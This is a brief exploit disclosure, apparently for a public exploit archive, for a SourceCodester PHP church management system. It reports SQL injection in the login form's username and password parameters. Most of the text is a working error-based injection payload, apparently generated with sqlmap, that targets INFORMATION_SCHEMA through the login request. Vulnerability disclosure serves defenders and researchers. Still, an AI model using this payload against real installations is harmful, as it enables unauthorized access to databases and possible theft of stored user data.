Exploit Author: anx0ing@gmail.com
https://www.sourcecodester.com
https://www.sourcecodester.com/php/11206/church-management-system.html
username、passwordParameters have SQL injection
payload
login=Login&password=admin&username=' OR (SELECT 7064 FROM(SELECT COUNT(*),CONCAT(0x71627a7671,(SELECT (ELT(7064=7064,1))),0x716b707871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- jURL
SQLMAP Test
